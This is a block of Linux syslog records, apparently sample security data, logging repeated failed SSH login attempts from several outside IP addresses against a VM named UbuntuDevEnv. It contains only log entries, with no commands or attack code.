+10866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:51,UbuntuDevEnv,2019-06-26 00:10:51,auth,UbuntuDevEnv,info,Invalid user vps from 118.222.146.186 port 51012,68759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,118.222.146.1,51012,,
+10867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:51,UbuntuDevEnv,2019-06-26 00:10:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,68759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:51,UbuntuDevEnv,2019-06-26 00:10:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:53,UbuntuDevEnv,2019-06-26 00:10:53,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 118.222.146.186 port 51012 ssh2,68759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,118.222.146.1,51012,,
+10870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:53,UbuntuDevEnv,2019-06-26 00:10:53,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 118.222.146.186 port 51012 [preauth],68759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,118.222.146.1,51012,,
+10871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:53,UbuntuDevEnv,2019-06-26 00:10:53,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 51012:11: Bye Bye [preauth],68759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,51012,,
+10872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:54,UbuntuDevEnv,2019-06-26 00:10:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61  user=test,68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,196.27.127.6,,0,
+10873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:56,UbuntuDevEnv,2019-06-26 00:10:55,auth,UbuntuDevEnv,info,Failed password for test from 196.27.127.61 port 57655 ssh2,68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,57655,,
+10874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:56,UbuntuDevEnv,2019-06-26 00:10:56,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 57655:11: Bye Bye [preauth],68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,57655,,
+10875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:56,UbuntuDevEnv,2019-06-26 00:10:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 196.27.127.61 port 57655 [preauth],68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,196.27.127.6,57655,,
+10876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:15,UbuntuDevEnv,2019-06-26 00:11:14,auth,UbuntuDevEnv,info,Invalid user charles from 104.248.121.67 port 38525,68843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,104.248.121.6,38525,,
+10877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:15,UbuntuDevEnv,2019-06-26 00:11:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,68843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+10878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:15,UbuntuDevEnv,2019-06-26 00:11:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:17,UbuntuDevEnv,2019-06-26 00:11:16,auth,UbuntuDevEnv,info,Failed password for invalid user charles from 104.248.121.67 port 38525 ssh2,68843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,104.248.121.6,38525,,
+10880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:17,UbuntuDevEnv,2019-06-26 00:11:16,auth,UbuntuDevEnv,info,Disconnected from invalid user charles 104.248.121.67 port 38525 [preauth],68843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,104.248.121.6,38525,,
+10881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:17,UbuntuDevEnv,2019-06-26 00:11:16,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 38525:11: Bye Bye [preauth],68843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,38525,,
+10882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:49,UbuntuDevEnv,2019-06-26 00:11:48,auth,UbuntuDevEnv,info,Invalid user oracle from 114.112.81.180 port 42010,68964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,114.112.81.1,42010,,
+10883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:49,UbuntuDevEnv,2019-06-26 00:11:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,68964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:49,UbuntuDevEnv,2019-06-26 00:11:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:51,UbuntuDevEnv,2019-06-26 00:11:50,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 114.112.81.180 port 42010 ssh2,68964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,114.112.81.1,42010,,
+10886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:51,UbuntuDevEnv,2019-06-26 00:11:50,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 114.112.81.180 port 42010 [preauth],68964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,114.112.81.1,42010,,
+10887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:51,UbuntuDevEnv,2019-06-26 00:11:50,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 42010:11: Bye Bye [preauth],68964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,42010,,
+10888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:56,UbuntuDevEnv,2019-06-26 00:11:55,auth,UbuntuDevEnv,info,Invalid user zhuo from 88.247.110.88 port 15177,68995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuo,88.247.110.8,15177,,
+10889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:56,UbuntuDevEnv,2019-06-26 00:11:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:56,UbuntuDevEnv,2019-06-26 00:11:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,68995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:58,UbuntuDevEnv,2019-06-26 00:11:57,auth,UbuntuDevEnv,info,Failed password for invalid user zhuo from 88.247.110.88 port 15177 ssh2,68995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuo,88.247.110.8,15177,,
+10892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:58,UbuntuDevEnv,2019-06-26 00:11:57,auth,UbuntuDevEnv,info,Disconnected from invalid user zhuo 88.247.110.88 port 15177 [preauth],68995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuo,88.247.110.8,15177,,
+10893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:11:58,UbuntuDevEnv,2019-06-26 00:11:57,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 15177:11: Bye Bye [preauth],68995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,15177,,
+10894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:33,UbuntuDevEnv,2019-06-26 00:12:32,auth,UbuntuDevEnv,info,Invalid user transfer from 118.222.146.186 port 39542,69120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,118.222.146.1,39542,,
+10895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:33,UbuntuDevEnv,2019-06-26 00:12:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,69120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:33,UbuntuDevEnv,2019-06-26 00:12:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:34,UbuntuDevEnv,2019-06-26 00:12:34,auth,UbuntuDevEnv,info,Failed password for invalid user transfer from 118.222.146.186 port 39542 ssh2,69120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,118.222.146.1,39542,,
+10898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:35,UbuntuDevEnv,2019-06-26 00:12:34,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 39542:11: Bye Bye [preauth],69120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,39542,,
+10899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:35,UbuntuDevEnv,2019-06-26 00:12:34,auth,UbuntuDevEnv,info,Disconnected from invalid user transfer 118.222.146.186 port 39542 [preauth],69120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,118.222.146.1,39542,,
+10900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:36,UbuntuDevEnv,2019-06-26 00:12:36,auth,UbuntuDevEnv,info,Invalid user guest from 186.31.116.78 port 40523,69132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,186.31.116.7,40523,,
+10901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:36,UbuntuDevEnv,2019-06-26 00:12:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,69132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+10902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:36,UbuntuDevEnv,2019-06-26 00:12:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:38,UbuntuDevEnv,2019-06-26 00:12:38,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 186.31.116.78 port 40523 ssh2,69132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,186.31.116.7,40523,,
+10904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:38,UbuntuDevEnv,2019-06-26 00:12:38,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 186.31.116.78 port 40523 [preauth],69132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,186.31.116.7,40523,,
+10905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:38,UbuntuDevEnv,2019-06-26 00:12:38,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 40523:11: Bye Bye [preauth],69132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,40523,,
+10906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:39,UbuntuDevEnv,2019-06-26 00:12:38,auth,UbuntuDevEnv,info,Invalid user centos from 104.248.121.67 port 46963,69151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,104.248.121.6,46963,,
+10907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:39,UbuntuDevEnv,2019-06-26 00:12:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,69151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+10908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:39,UbuntuDevEnv,2019-06-26 00:12:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:41,UbuntuDevEnv,2019-06-26 00:12:41,auth,UbuntuDevEnv,info,Failed password for invalid user centos from 104.248.121.67 port 46963 ssh2,69151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,104.248.121.6,46963,,
+10910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:41,UbuntuDevEnv,2019-06-26 00:12:41,auth,UbuntuDevEnv,info,Disconnected from invalid user centos 104.248.121.67 port 46963 [preauth],69151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,104.248.121.6,46963,,
+10911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:41,UbuntuDevEnv,2019-06-26 00:12:41,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 46963:11: Bye Bye [preauth],69151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,46963,,
+10912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:48,UbuntuDevEnv,2019-06-26 00:12:48,auth,UbuntuDevEnv,info,Invalid user lo from 196.27.127.61 port 37743,69182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lo,196.27.127.6,37743,,
+10913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:48,UbuntuDevEnv,2019-06-26 00:12:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:48,UbuntuDevEnv,2019-06-26 00:12:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,69182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:50,UbuntuDevEnv,2019-06-26 00:12:50,auth,UbuntuDevEnv,info,Failed password for invalid user lo from 196.27.127.61 port 37743 ssh2,69182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lo,196.27.127.6,37743,,
+10916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:50,UbuntuDevEnv,2019-06-26 00:12:50,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 37743:11: Bye Bye [preauth],69182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,37743,,
+10917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:50,UbuntuDevEnv,2019-06-26 00:12:50,auth,UbuntuDevEnv,info,Disconnected from invalid user lo 196.27.127.61 port 37743 [preauth],69182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lo,196.27.127.6,37743,,
+10918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:54,UbuntuDevEnv,2019-06-26 00:12:54,auth,UbuntuDevEnv,info,Invalid user roseline from 131.100.219.3 port 52218,69202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roseline,131.100.219.3,52218,,
+10919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:54,UbuntuDevEnv,2019-06-26 00:12:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,69202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+10920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:54,UbuntuDevEnv,2019-06-26 00:12:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:56,UbuntuDevEnv,2019-06-26 00:12:55,auth,UbuntuDevEnv,info,Failed password for invalid user roseline from 131.100.219.3 port 52218 ssh2,69202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roseline,131.100.219.3,52218,,
+10922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:56,UbuntuDevEnv,2019-06-26 00:12:56,auth,UbuntuDevEnv,info,Disconnected from invalid user roseline 131.100.219.3 port 52218 [preauth],69202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roseline,131.100.219.3,52218,,
+10923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:12:56,UbuntuDevEnv,2019-06-26 00:12:56,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 52218:11: Bye Bye [preauth],69202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,52218,,
+10924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:28,UbuntuDevEnv,2019-06-26 00:13:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180  user=test,69325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,114.112.81.1,,0,
+10925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:30,UbuntuDevEnv,2019-06-26 00:13:30,auth,UbuntuDevEnv,info,Failed password for test from 114.112.81.180 port 60888 ssh2,69325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,60888,,
